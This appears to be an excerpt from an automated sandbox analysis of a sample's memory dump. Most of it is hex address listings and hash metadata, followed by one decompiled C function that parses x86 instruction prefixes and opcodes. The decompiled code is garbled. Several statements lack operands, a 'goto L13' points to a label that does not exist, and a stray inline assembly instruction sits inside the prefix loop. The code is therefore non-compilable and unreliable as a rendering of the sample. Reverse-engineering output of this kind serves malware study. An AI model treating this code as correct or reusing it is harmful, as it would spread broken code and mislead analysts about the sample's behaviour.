                                                                                                        0x6e47880a
                                                                                                        0x6e47880e
                                                                                                        0x6e478817
                                                                                                        0x6e478822
                                                                                                        0x6e478826
                                                                                                        0x6e47882f
                                                                                                        0x6e478834
                                                                                                        0x6e47883a
                                                                                                        0x6e47883b
                                                                                                        0x6e47883f
                                                                                                        0x6e478843
                                                                                                        0x6e47884a
                                                                                                        0x6e47884c
                                                                                                        0x6e47898c
                                                                                                        0x6e47899d
                                                                                                        0x6e4789a4
                                                                                                        0x6e4789ab
                                                                                                        0x6e4789ab
                                                                                                        0x6e4789ae
                                                                                                        0x6e4789b1
                                                                                                        0x6e4789b4
                                                                                                        0x6e4789ba
                                                                                                        0x6e4789c1
                                                                                                        0x6e4789c5
                                                                                                        0x6e4789ce
                                                                                                        0x00000000
                                                                                                        0x6e4789ce
                                                                                                        0x6e4789bc
                                                                                                        0x6e4789bf
                                                                                                        0x6e4789d8
                                                                                                        0x6e4789f0
                                                                                                        0x6e4789f3
                                                                                                        0x6e4789f8
                                                                                                        0x6e478a02
                                                                                                        0x6e478a05
                                                                                                        0x6e478a08
                                                                                                        0x6e478a11
                                                                                                        0x00000000
                                                                                                        0x6e478a11
                                                                                                        0x00000000
                                                                                                        0x6e4789bf
                                                                                                        0x6e478854
                                                                                                        0x6e478854
                                                                                                        0x6e478856
                                                                                                        0x6e47885a
                                                                                                        0x6e47885f
                                                                                                        0x6e478861
                                                                                                        0x6e478865
                                                                                                        0x6e478868
                                                                                                        0x6e478870
                                                                                                        0x6e478872
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e478889
                                                                                                        0x6e4788a4
                                                                                                        0x6e4788a6
                                                                                                        0x6e4788b4
                                                                                                        0x6e4788b9
                                                                                                        0x6e4788bb
                                                                                                        0x6e4788d8
                                                                                                        0x6e4788d8
                                                                                                        0x6e4788dc
                                                                                                        0x6e4788de
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e4788e0
                                                                                                        0x6e4788e3
                                                                                                        0x6e478904
                                                                                                        0x6e478923
                                                                                                        0x6e478929
                                                                                                        0x6e47892c
                                                                                                        0x6e478931
                                                                                                        0x6e478932
                                                                                                        0x6e478939
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e478941
                                                                                                        0x6e478941
                                                                                                        0x6e478943
                                                                                                        0x6e47894f
                                                                                                        0x6e47895b
                                                                                                        0x6e47897d
                                                                                                        0x6e478982
                                                                                                        0x6e478983
                                                                                                        0x6e478983
                                                                                                        0x00000000
                                                                                                        0x6e478943
                                                                                                        0x00000000
                                                                                                        0x6e4788e3
                                                                                                        0x6e4788bd
                                                                                                        0x6e4788c3
                                                                                                        0x6e4788c5
                                                                                                        0x6e4788c6
                                                                                                        0x6e4788c7
                                                                                                        0x6e4788c8
                                                                                                        0x6e4788cc
                                                                                                        0x6e4788d0
                                                                                                        0x6e4788d2
                                                                                                        0x6e4788d3
                                                                                                        0x6e4788d4
                                                                                                        0x6e4788d6
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e4788d6
                                                                                                        0x6e4788e9
                                                                                                        0x00000000
                                                                                                        0x6e4788e9
                                                                                                        0x6e4786d8
                                                                                                        0x6e4786da
                                                                                                        0x6e4786dc
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e4786e6
                                                                                                        0x6e4786e6
                                                                                                        0x6e4786e8
                                                                                                        0x6e4786eb
                                                                                                        0x6e4786ed
                                                                                                        0x6e4786f5
                                                                                                        0x6e4786fc
                                                                                                        0x6e478700
                                                                                                        0x6e478703
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e4787ff
                                                                                                        0x6e478800
                                                                                                        0x6e478802
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e478802
                                                                                                        0x6e478709
                                                                                                        0x6e47870c
                                                                                                        0x6e478715
                                                                                                        0x6e47871a
                                                                                                        0x6e47871c
                                                                                                        0x6e478728
                                                                                                        0x6e47872c
                                                                                                        0x6e478731
                                                                                                        0x6e478735
                                                                                                        0x6e478b12
                                                                                                        0x6e478b26
                                                                                                        0x6e478b48
                                                                                                        0x6e478b4d
                                                                                                        0x6e478b4d
                                                                                                        0x6e47874b
                                                                                                        0x6e478750
                                                                                                        0x6e478754
                                                                                                        0x6e478754
                                                                                                        0x6e478754
                                                                                                        0x6e478754
                                                                                                        0x6e478759
                                                                                                        0x6e47875e
                                                                                                        0x6e478760
                                                                                                        0x6e478764
                                                                                                        0x6e47876b
                                                                                                        0x6e478770
                                                                                                        0x6e478772
                                                                                                        0x6e478ad3
                                                                                                        0x6e478ae2
                                                                                                        0x6e478afb
                                                                                                        0x6e478b00
                                                                                                        0x6e478b00
                                                                                                        0x6e478785
                                                                                                        0x6e47878a
                                                                                                        0x6e47878e
                                                                                                        0x6e47878e
                                                                                                        0x6e47878e
                                                                                                        0x6e4787a0
                                                                                                        0x6e4787c1
                                                                                                        0x6e4787c9
                                                                                                        0x6e4787d7
                                                                                                        0x6e4787f5
                                                                                                        0x6e4787fb
                                                                                                        0x6e4787fb
                                                                                                        0x00000000
                                                                                                        0x6e47870c
                                                                                                        0x6e4785a4
                                                                                                        0x6e4785a4
                                                                                                        0x6e4785a6
                                                                                                        0x6e4785ad
                                                                                                        0x6e4785bb
                                                                                                        0x6e4785bd
                                                                                                        0x6e4785c1
                                                                                                        0x6e4785c3
                                                                                                        0x6e4785c5
                                                                                                        0x6e478600
                                                                                                        0x6e47860f
                                                                                                        0x6e478611
                                                                                                        0x6e478613
                                                                                                        0x6e478631
                                                                                                        0x6e478633
                                                                                                        0x6e478635
                                                                                                        0x6e478647
                                                                                                        0x6e478665
                                                                                                        0x6e47866e
                                                                                                        0x6e478671
                                                                                                        0x6e47867f
                                                                                                        0x6e478690
                                                                                                        0x6e4786ae
                                                                                                        0x6e4786b0
                                                                                                        0x6e4786b4
                                                                                                        0x6e4786b4
                                                                                                        0x6e4786b4
                                                                                                        0x6e478635
                                                                                                        0x00000000
                                                                                                        0x6e478613
                                                                                                        0x6e4785cb
                                                                                                        0x6e4785cb
                                                                                                        0x6e4785d0
                                                                                                        0x6e4785d7
                                                                                                        0x6e4785e6
                                                                                                        0x6e4785ed
                                                                                                        0x6e4785ef
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e4785fb
                                                                                                        0x6e4785fc
                                                                                                        0x6e4785fe
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e4785fe
                                                                                                        0x6e4785f1
                                                                                                        0x6e4785f4
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e4786b6
                                                                                                        0x6e4786b6
                                                                                                        0x6e4786b7
                                                                                                        0x6e4786b7
                                                                                                        0x00000000
                                                                                                        0x6e478497
                                                                                                        0x6e478497
                                                                                                        0x6e478497
                                                                                                        0x6e478499
                                                                                                        0x6e4784a0
                                                                                                        0x6e4784ae
                                                                                                        0x6e4784b0
                                                                                                        0x6e4784b4
                                                                                                        0x6e4784b6
                                                                                                        0x6e4784e2
                                                                                                        0x6e4784e6
                                                                                                        0x6e4784eb
                                                                                                        0x6e4784f0
                                                                                                        0x6e4784f4
                                                                                                        0x6e4784f8
                                                                                                        0x6e4784ff
                                                                                                        0x6e478504
                                                                                                        0x6e478506
                                                                                                        0x6e478a95
                                                                                                        0x6e478aa4
                                                                                                        0x6e478ac3
                                                                                                        0x6e478ac8
                                                                                                        0x6e478ac8
                                                                                                        0x6e478519
                                                                                                        0x6e47851e
                                                                                                        0x6e478522
                                                                                                        0x6e478522
                                                                                                        0x6e478522
                                                                                                        0x6e478533
                                                                                                        0x6e478535
                                                                                                        0x6e478537
                                                                                                        0x6e478548
                                                                                                        0x6e478548
                                                                                                        0x6e47854d
                                                                                                        0x6e478552
                                                                                                        0x6e478556
                                                                                                        0x6e47855b
                                                                                                        0x6e478562
                                                                                                        0x6e478567
                                                                                                        0x6e478569
                                                                                                        0x6e478a57
                                                                                                        0x6e478a63
                                                                                                        0x6e478a7d
                                                                                                        0x6e478a82
                                                                                                        0x6e478a82
                                                                                                        0x6e47857f
                                                                                                        0x6e478584
                                                                                                        0x6e478588
                                                                                                        0x6e478588
                                                                                                        0x6e478588
                                                                                                        0x6e478588
                                                                                                        0x6e47858b
                                                                                                        0x6e47858b
                                                                                                        0x00000000
                                                                                                        0x6e47858b
                                                                                                        0x6e4784ba
                                                                                                        0x6e4784ba
                                                                                                        0x6e4784bc
                                                                                                        0x6e4784c8
                                                                                                        0x6e4784cf
                                                                                                        0x6e4784d1
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e4784dd
                                                                                                        0x6e4784de
                                                                                                        0x6e4784e0
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e4784e0
                                                                                                        0x6e4784d3
                                                                                                        0x6e4784d6
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e47858c
                                                                                                        0x6e478590
                                                                                                        0x6e478591
                                                                                                        0x6e478591
                                                                                                        0x00000000
                                                                                                        0x6e478499
                                                                                                        0x6e478491

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1054100443.000000006E471000.00000020.00020000.sdmp, Offset: 6E470000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1054027780.000000006E470000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.1054127041.000000006E48A000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.1054184258.000000006E48D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.1054198576.000000006E48F000.00000002.00020000.sdmp Download File
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID: 0-3916222277
                                                                                                        • Opcode ID: 279083827db811fd0b89b997a3ea316dd13a70475ee85e0ee703b4e748732df2
                                                                                                        • Instruction ID: 133c6519ca95d1d1631e1515d08f0516113689ead07eccfcc2a827c340c729c2
                                                                                                        • Opcode Fuzzy Hash: 279083827db811fd0b89b997a3ea316dd13a70475ee85e0ee703b4e748732df2
                                                                                                        • Instruction Fuzzy Hash: 07124D715092059FCB34DFB5C980EEE77E9AF94204F104E2EE599972A1EB309C45CBD2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 6E489370, Relevance: 1.8, Strings: 1, Instructions: 529COMMONCrypto
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 99%
                                                                                                        			E6E489370(intOrPtr __ecx, intOrPtr __edx, void* __eflags) {
				signed int _t250;
				signed char _t251;
				signed char* _t254;
				char _t255;
				signed short _t256;
				char _t257;
				signed short _t260;
				signed int _t261;
				signed int _t262;
				void* _t264;
				void* _t272;
				void* _t273;
				signed short* _t274;
				signed char _t275;
				signed int _t277;
				signed int _t278;
				void* _t282;
				signed int _t288;
				unsigned int _t290;
				signed int _t292;
				signed int _t293;
				signed int _t294;
				signed int _t295;
				unsigned int _t296;
				unsigned int _t297;
				signed int _t299;
				unsigned int _t301;
				signed char _t302;
				signed int _t304;
				signed char _t307;
				signed char _t308;
				signed int _t309;
				void* _t312;
				void* _t313;
				signed int _t314;
				signed int _t316;
				signed int _t319;
				signed int _t321;
				signed int _t338;
				signed int _t339;
				signed int _t343;
				signed int _t345;
				unsigned int* _t346;
				unsigned int _t354;
				signed int _t355;
				void* _t357;
				signed int _t364;
				signed int _t366;
				signed int _t383;
				signed int _t388;
				signed int _t391;
				signed int _t395;
				signed int _t396;
				signed int _t397;
				signed int _t398;
				signed int _t399;
				signed int _t400;
				signed int _t403;
				signed int _t408;
				signed int _t411;
				signed int _t412;
				signed int _t413;
				signed int _t417;
				signed int _t419;
				signed int _t424;
				void* _t426;
				signed int* _t427;

				 *((intOrPtr*)(_t426 + 0x24)) = __edx;
				 *((intOrPtr*)(_t426 + 0x10)) = __ecx;
				 *((intOrPtr*)(_t426 + 0x14)) = __ecx;
				_t274 =  *(_t426 + 0x48);
				E6E483698( *(_t426 + 0x48), 0, 0x1c);
				_t427 = _t426 + 0xc;
				_t338 = 0;
				_t282 = 0x10;
				do {
					_t250 =  *_t274 & 0x000000ff;
					_t274 =  &(_t274[0]);
					if(_t250 == 0xf3) {
						_t383 = _t427[0x10];
						_t339 = _t338 | 0x00000004;
						L18:
						_t338 = _t339 & 0x000000ff;
						 *(_t383 + 1) = _t250;
						goto L19;
					}
					if(_t250 == 0xf2) {
						_t383 = _t427[0x10];
						_t339 = _t338 | 0x00000002;
						goto L18;
					}
					if(_t250 == 0xf0) {
						_t338 = (_t338 | 0x00000020) & 0x000000ff;
						 *(_t427[0x10] + 2) = _t250;
						goto L19;
					}
					if(_t250 == 0x26 || _t250 == 0x2e || _t250 == 0x36 || _t250 == 0x3e) {
						L14:
						_t338 = (_t338 | 0x00000040) & 0x000000ff;
						 *(_t427[0x10] + 3) = _t250;
					} else {
						_t6 = _t250 - 0x64; // -100
						if(_t6 <= 1) {
							goto L14;
						}
						if (_t250 == 0x66) goto L13;
						asm("adc [ebx+0x587567f8], eax");
					}
					L19:
					_t282 = _t282 + 0xff;
				} while (_t282 != 0);
				_t388 = _t427[0x10];
				_t285 =  !=  ? _t338 : 1;
				_t343 = _t338 << 0x17;
				 *(_t388 + 6) = _t250;
				 *_t427 =  !=  ? _t338 : 1;
				 *(_t388 + 0x18) = _t343;
				if(_t250 == 0xf) {
					_t250 =  *_t274 & 0x000000ff;
					_t274 =  &(_t274[0]);
					_t427[5] = _t250;
					 *(_t427[0x10] + 7) = _t250;
					_t427[2] = _t427[4] + 0x4a;
				} else {
					_t22 = _t250 - 0xa0; // -160
					_t427[5] =  *(_t427[0x10] + 7) & 0x000000ff;
					if(_t22 <= 3) {
						_t424 =  *_t427;
						_t382 =  !=  ? (_t424 | 0x00000008) & 0x000000ff : _t424 & 0x000000f7;
						 *_t427 =  !=  ? (_t424 | 0x00000008) & 0x000000ff : _t424 & 0x000000f7;
					}
				}
				_t354 = _t250 >> 2;
				_t391 = _t250 & 0x00000003;
				_t345 = _t427[2];
				_t427[3] = _t391;
				_t427[6] = _t354;
				_t288 =  *(( *(_t354 + _t345) & 0x000000ff) + _t391 + _t345) & 0x000000ff;
				_t427[1] = _t288;
				if(_t288 == 0xff) {
					_t343 = _t343 + 0x3000;
					_t288 = 0 | (_t250 & 0xfffffffd) == 0x00000024;
					 *(_t427[0x10] + 0x18) = _t343;
					_t427[1] = _t288;
				}
				if((_t427[1] & 0x00000080) != 0) {
					_t290 =  *((_t288 & 0x0000007f) + _t345) & 0x0000ffff;
					_t427[1] = _t290;
					_t395 = _t290 >> 8;
				} else {
					_t395 = 0;
				}
				if(_t427[5] != 0 && ( *_t427 &  *(( *(_t427[6] + _t427[4] + 0x130) & 0x000000ff) + _t427[3] + _t427[4] + 0x130) & 0x000000ff) != 0) {
					_t343 = _t343 | 0x00003000;
					 *(_t427[0x10] + 0x18) = _t343;
				}
				if((_t427[1] & 0x00000001) == 0) {
					if(( *_t427 & 0x00000020) != 0) {
						_t343 = _t343 | 0x00009000;
						 *(_t427[0x10] + 0x18) = _t343;
					}
					goto L115;
				} else {
					_t355 = _t427[0x10];
					_t343 = _t343 | 0x00000001;
					 *(_t355 + 0x18) = _t343;
					_t296 =  *_t274 & 0x000000ff;
					_t346 =  &(_t427[6]);
					 *_t346 = _t296;
					 *(_t355 + 8) = _t296;
					_t297 = _t296 >> 6;
					_t427[3] = _t297;
					 *(_t355 + 9) = _t297;
					_t299 =  *_t346 & 0x00000007;
					_t427[7] = _t299;
					 *(_t355 + 0xb) = _t299;
					_t301 =  *_t346 & 0x0000003f;
					 *_t346 = _t301;
					_t302 = _t301 >> 3;
					_t427[2] = _t302;
					 *(_t355 + 0xa) = _t302;
					if(_t395 != 0 && (_t395 << _t302 & 0x00000080) != 0) {
						_t343 = _t343 | 0x00003000;
						 *(_t427[0x10] + 0x18) = _t343;
					}
					if(_t427[5] == 0) {
						_t80 = _t250 - 0xd9; // -217
						if(_t80 <= 6) {
							_t81 = _t250 + 0x27; // 0x27
							_t417 = _t81 & 0x000000ff;
							if(_t427[3] != 3) {
								_t419 = ( *(_t417 + _t427[4] + 0xf1) & 0x000000ff) << _t427[2];
							} else {
								_t419 = ( *(_t427[4] + _t427[2] + 0xf8 + _t417 * 8) & 0x000000ff) << _t427[7];
							}
							if((_t419 & 0x00000080) != 0) {
								_t343 = _t343 | 0x00003000;
								 *(_t427[0x10] + 0x18) = _t343;
							}
						}
					}
					if(( *_t427 & 0x00000020) == 0) {
						L53:
						if(_t427[5] == 0) {
							if(_t250 == 0x8c) {
								L86:
								if(_t427[2] <= 5) {
									L88:
									_t427[5] = _t274[0];
									_t427[4] =  &(_t274[1]);
									if(_t427[2] <= 1) {
										if(_t250 != 0xf6) {
											_t309 = _t427[1];
											_t310 =  ==  ? _t309 | 0xffffff90 : _t309;
											_t427[1] =  ==  ? _t309 | 0xffffff90 : _t309;
										} else {
											_t427[1] = _t427[1] | 0xffffff82;
										}
									}
									if(_t427[3] == 0) {
										if(( *_t427 & 0x00000010) == 0) {
											_t264 = 4;
											_t357 =  ==  ? _t264 : 0;
										} else {
											_t273 = 2;
											_t357 =  ==  ? _t273 : 0;
										}
									} else {
										if(_t427[3] == 1) {
											_t357 = 1;
										} else {
											if(_t427[3] == 2) {
												_t357 = (( !( *_t427) & 0x00000010) >> 3) + 2;
											} else {
												_t357 = 0;
											}
										}
									}
									if(_t427[3] != 3 && _t427[7] == 4 && ( *_t427 & 0x00000010) == 0) {
										_t307 = _t427[5];
										_t343 = _t343 | 0x00000002;
										_t403 = _t427[0x10];
										_t427[4] =  &(_t274[1]);
										 *(_t403 + 0xc) = _t307;
										_t308 = _t307 & 0x00000007;
										 *(_t403 + 0x18) = _t343;
										 *(_t403 + 0xd) = _t307 >> 6;
										 *(_t403 + 0xe) = (_t307 & 0x0000003f) >> 3;
										 *(_t403 + 0xf) = _t308;
										if(_t308 == 5) {
											_t272 = 4;
											_t357 =  ==  ? _t272 : _t357;
										}
									}
									if(_t357 == 1) {
										_t304 = _t427[0x10];
										_t343 = _t343 | 0x00000020;
										 *(_t304 + 0x18) = _t343;
										 *((char*)(_t304 + 0x14)) =  *(_t427[4] - 1);
									} else {
										if(_t357 == 2) {
											_t277 = _t427[0x10];
											_t343 = _t343 | 0x00000040;
											 *(_t277 + 0x18) = _t343;
											 *((short*)(_t277 + 0x14)) =  *(_t427[4] - 1) & 0x0000ffff;
										} else {
											if(_t357 == 4) {
												_t278 = _t427[0x10];
												_t343 = _t343 | 0x00000080;
												 *(_t278 + 0x18) = _t343;
												 *(_t278 + 0x14) =  *(_t427[4] - 1);
											}
										}
									}
									_t195 = _t427[4] - 1; // -1
									_t274 = _t357 + _t195;
									L115:
									_t251 = _t427[1];
									_t292 = _t251 & 0x00000040;
									if((_t251 & 0x00000010) == 0) {
										L122:
										if((_t427[1] & 0x00000004) == 0) {
											L130:
											if((_t427[1] & 0x00000002) != 0) {
												_t396 = _t427[0x10];
												_t343 = _t343 | 0x00000004;
												 *(_t396 + 0x18) = _t343;
												_t257 =  *_t274;
												_t274 =  &(_t274[0]);
												 *((char*)(_t396 + 0x10)) = _t257;
											}
											if(_t292 == 0) {
												if((_t427[1] & 0x00000020) != 0) {
													_t293 = _t427[0x10];
													_t343 = _t343 | 0x00000104;
													 *(_t293 + 0x18) = _t343;
													_t255 =  *_t274;
													_t274 =  &(_t274[0]);
													 *((char*)(_t293 + 0x10)) = _t255;
												}
												goto L136;
											} else {
												L133:
												_t294 = _t427[0x10];
												_t343 = _t343 | 0x00000110;
												 *(_t294 + 0x18) = _t343;
												_t256 =  *_t274;
												_t274 =  &(_t274[2]);
												 *(_t294 + 0x10) = _t256;
												L136:
												_t275 = _t274 - _t427[0xf];
												if(_t275 <= 0xf) {
													 *(_t427[0x10]) = _t275;
												} else {
													_t254 = _t427[0x10];
													_t275 = 0xf;
													_t254[0x18] = _t343 | 0x00005000;
													 *_t254 = _t275;
												}
												return _t275 & 0x000000ff;
											}
										}
										if((_t343 & 0x00000010) == 0) {
											if((_t343 & 0x00000008) == 0) {
												_t397 = _t427[0x10];
												_t343 = _t343 | 0x00000008;
												 *(_t397 + 0x18) = _t343;
												 *((short*)(_t397 + 0x10)) =  *_t274 & 0x0000ffff;
												L129:
												_t274 =  &(_t274[1]);
												goto L130;
											}
											_t398 = _t427[0x10];
											_t343 = _t343 | 0x00000800;
											L127:
											 *(_t398 + 0x18) = _t343;
											 *((short*)(_t398 + 0x14)) =  *_t274 & 0x0000ffff;
											goto L129;
										}
										_t398 = _t427[0x10];
										_t343 = _t343 | 0x00000008;
										goto L127;
									}
									if(_t292 == 0) {
										if(( *_t427 & 0x00000008) == 0) {
											_t399 = _t427[0x10];
											_t343 = _t343 | 0x00000010;
											 *(_t399 + 0x18) = _t343;
											_t260 =  *_t274;
											_t274 =  &(_t274[2]);
											 *(_t399 + 0x10) = _t260;
										} else {
											_t400 = _t427[0x10];
											_t343 = _t343 | 0x00000008;
											 *(_t400 + 0x18) = _t343;
											_t261 =  *_t274 & 0x0000ffff;
											_t274 =  &(_t274[1]);
											 *(_t400 + 0x10) = _t261;
										}
										goto L122;
									}
									if(( *_t427 & 0x00000008) == 0) {
										goto L133;
									}
									_t295 = _t427[0x10];
									_t343 = _t343 | 0x00000108;
									 *(_t295 + 0x18) = _t343;
									_t262 =  *_t274 & 0x0000ffff;
									_t274 =  &(_t274[1]);
									 *(_t295 + 0x10) = _t262;
									goto L136;
								}
								L87:
								_t343 = _t343 | 0x00011000;
								 *(_t427[0x10] + 0x18) = _t343;
								goto L88;
							}
							if(_t250 != 0x8e) {
								L67:
								if(_t427[3] != 3) {
									if(_t427[5] == 0) {
										goto L88;
									}
									if(_t250 == 0xd7 || _t250 == 0xf7) {
										L84:
										if(( *_t427 & 0x00000009) != 0) {
											goto L87;
										}
									} else {
										if(_t250 == 0xd6) {
											if(( *_t427 & 0x00000006) != 0) {
												goto L87;
											}
											goto L88;
										}
										if(_t250 == 0xc5) {
											goto L87;
										}
										if(_t250 == 0x50) {
											goto L84;
										}
									}
									goto L88;
								}
								_t364 = _t427[4];
								_t312 = _t364 + 0x1da;
								_t366 =  !=  ? _t312 : _t364 + 0x1cb;
								_t313 =  !=  ? _t427[9] + _t364 : _t312;
								_t427[4] = _t366;
								if(_t366 == _t313) {
									goto L88;
								} else {
									goto L69;
								}
								while(1) {
									L69:
									_t408 = _t427[4];
									if(_t250 ==  *_t408) {
										break;
									}
									_t411 = _t408 + 3;
									_t427[4] = _t411;
									if(_t411 != _t313) {
										continue;
									}
									goto L88;
								}
								_t314 = _t408;
								if(( *_t427 &  *(_t314 + 1) & 0x000000ff) == 0) {
									goto L88;
								}
								if((( *(_t314 + 2) & 0x000000ff) << _t427[2] & 0x00000080) == 0) {
									goto L87;
								}
								goto L88;
							}
							if(_t427[2] == 1) {
								goto L87;
							}
							goto L86;
						}
						if(_t250 == 0x20 || _t250 == 0x22) {
							_t316 = 3;
							_t427[3] = _t316;
							if(_t427[2] > 4 || _t427[2] == 1) {
								goto L87;
							} else {
								goto L88;
							}
						} else {
							if(_t250 == 0x21 || _t250 == 0x23) {
								_t319 = 3;
								_t427[3] = _t319;
								if((_t427[6] & 0xfffffff0) == 0x20) {
									goto L87;
								}
								goto L88;
							} else {
								goto L67;
							}
						}
					}
					if(_t427[3] == 3) {
						L52:
						_t343 = _t343 | 0x00009000;
						 *(_t427[0x10] + 0x18) = _t343;
						goto L53;
					}
					_t412 = _t427[4];
					_t321 = _t250;
					_t427[8] = _t412 + 0x1b9;
					if(_t427[5] == 0) {
						_t413 = _t412 + 0x1a1;
						_t321 = _t250 & 0x000000fe;
					} else {
						_t413 = _t427[8];
						_t427[8] = _t412 + 0x1cb;
					}
					while(_t413 != _t427[8]) {
						if(_t321 ==  *_t413) {
							if((( *(_t413 + 1) & 0x000000ff) << _t427[2] & 0x00000080) == 0) {
								goto L53;
							}
							goto L52;
						}
						_t413 = _t413 + 2;
					}
					goto L52;
				}
			}






































































                                                                                                        0x6e489377
                                                                                                        0x6e48937b
                                                                                                        0x6e489387
                                                                                                        0x6e48938b
                                                                                                        0x6e48938f
                                                                                                        0x6e489394
                                                                                                        0x6e489397
                                                                                                        0x6e489399
                                                                                                        0x6e48939b
                                                                                                        0x6e48939b
                                                                                                        0x6e48939e
                                                                                                        0x6e4893a4
                                                                                                        0x6e48941c
                                                                                                        0x6e489420
                                                                                                        0x6e489423
                                                                                                        0x6e489423
                                                                                                        0x6e489426
                                                                                                        0x00000000
                                                                                                        0x6e489426
                                                                                                        0x6e4893ab
                                                                                                        0x6e489413
                                                                                                        0x6e489417
                                                                                                        0x00000000
                                                                                                        0x6e489417
                                                                                                        0x6e4893b2
                                                                                                        0x6e48940b
                                                                                                        0x6e48940e
                                                                                                        0x00000000
                                                                                                        0x6e48940e
                                                                                                        0x6e4893b7
                                                                                                        0x6e4893f5
                                                                                                        0x6e4893fc
                                                                                                        0x6e4893ff
                                                                                                        0x6e4893c8
                                                                                                        0x6e4893c8
                                                                                                        0x6e4893ce
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e4893d3
                                                                                                        0x6e4893d4
                                                                                                        0x6e4893d4
                                                                                                        0x6e489429
                                                                                                        0x6e489429
                                                                                                        0x6e489429
                                                                                                        0x6e489432
                                                                                                        0x6e48943b
                                                                                                        0x6e48943e
                                                                                                        0x6e489441
                                                                                                        0x6e489444
                                                                                                        0x6e489447
                                                                                                        0x6e48944d
                                                                                                        0x6e48948f
                                                                                                        0x6e489492
                                                                                                        0x6e489493
                                                                                                        0x6e48949a
                                                                                                        0x6e48949d
                                                                                                        0x6e48944f
                                                                                                        0x6e489453
                                                                                                        0x6e48945d
                                                                                                        0x6e489464
                                                                                                        0x6e489466
                                                                                                        0x6e48947f
                                                                                                        0x6e489482
                                                                                                        0x6e489482
                                                                                                        0x6e489464
                                                                                                        0x6e4894a5
                                                                                                        0x6e4894a8
                                                                                                        0x6e4894ab
                                                                                                        0x6e4894af
                                                                                                        0x6e4894b3
                                                                                                        0x6e4894bd
                                                                                                        0x6e4894c1
                                                                                                        0x6e4894cb
                                                                                                        0x6e4894d4
                                                                                                        0x6e4894e1
                                                                                                        0x6e4894e4
                                                                                                        0x6e4894e7
                                                                                                        0x6e4894e7
                                                                                                        0x6e4894f3
                                                                                                        0x6e4894fe
                                                                                                        0x6e489504
                                                                                                        0x6e489508
                                                                                                        0x6e4894f5
                                                                                                        0x6e4894f5
                                                                                                        0x6e4894f5
                                                                                                        0x6e489510
                                                                                                        0x6e48953a
                                                                                                        0x6e489540
                                                                                                        0x6e489540
                                                                                                        0x6e489548
                                                                                                        0x6e4898f1
                                                                                                        0x6e4898f7
                                                                                                        0x6e4898fd
                                                                                                        0x6e4898fd
                                                                                                        0x00000000
                                                                                                        0x6e48954e
                                                                                                        0x6e48954e
                                                                                                        0x6e489552
                                                                                                        0x6e489555
                                                                                                        0x6e489558
                                                                                                        0x6e48955b
                                                                                                        0x6e48955f
                                                                                                        0x6e489561
                                                                                                        0x6e489564
                                                                                                        0x6e489567
                                                                                                        0x6e48956b
                                                                                                        0x6e489570
                                                                                                        0x6e489573
                                                                                                        0x6e489577
                                                                                                        0x6e48957c
                                                                                                        0x6e48957f
                                                                                                        0x6e489581
                                                                                                        0x6e489584
                                                                                                        0x6e489588
                                                                                                        0x6e48958d
                                                                                                        0x6e48959d
                                                                                                        0x6e4895a3
                                                                                                        0x6e4895a3
                                                                                                        0x6e4895ab
                                                                                                        0x6e4895ad
                                                                                                        0x6e4895b6
                                                                                                        0x6e4895b8
                                                                                                        0x6e4895bb
                                                                                                        0x6e4895c6
                                                                                                        0x6e4895f3
                                                                                                        0x6e4895c8
                                                                                                        0x6e4895df
                                                                                                        0x6e4895df
                                                                                                        0x6e4895fb
                                                                                                        0x6e489601
                                                                                                        0x6e489607
                                                                                                        0x6e489607
                                                                                                        0x6e4895fb
                                                                                                        0x6e4895b6
                                                                                                        0x6e48960e
                                                                                                        0x6e48967f
                                                                                                        0x6e489684
                                                                                                        0x6e4896dd
                                                                                                        0x6e48979f
                                                                                                        0x6e4897a4
                                                                                                        0x6e4897b3
                                                                                                        0x6e4897b9
                                                                                                        0x6e4897bd
                                                                                                        0x6e4897c6
                                                                                                        0x6e4897cd
                                                                                                        0x6e4897d6
                                                                                                        0x6e4897e4
                                                                                                        0x6e4897e7
                                                                                                        0x6e4897cf
                                                                                                        0x6e4897cf
                                                                                                        0x6e4897cf
                                                                                                        0x6e4897cd
                                                                                                        0x6e4897f0
                                                                                                        0x6e48981d
                                                                                                        0x6e489830
                                                                                                        0x6e489838
                                                                                                        0x6e48981f
                                                                                                        0x6e489821
                                                                                                        0x6e489829
                                                                                                        0x6e489829
                                                                                                        0x6e4897f2
                                                                                                        0x6e4897f7
                                                                                                        0x6e489816
                                                                                                        0x6e4897f9
                                                                                                        0x6e4897fe
                                                                                                        0x6e48980f
                                                                                                        0x6e489800
                                                                                                        0x6e489800
                                                                                                        0x6e489800
                                                                                                        0x6e4897fe
                                                                                                        0x6e4897f7
                                                                                                        0x6e489840
                                                                                                        0x6e48984f
                                                                                                        0x6e48985c
                                                                                                        0x6e489865
                                                                                                        0x6e489869
                                                                                                        0x6e48986d
                                                                                                        0x6e489870
                                                                                                        0x6e489873
                                                                                                        0x6e489876
                                                                                                        0x6e489879
                                                                                                        0x6e48987c
                                                                                                        0x6e489882
                                                                                                        0x6e489886
                                                                                                        0x6e48988c
                                                                                                        0x6e48988c
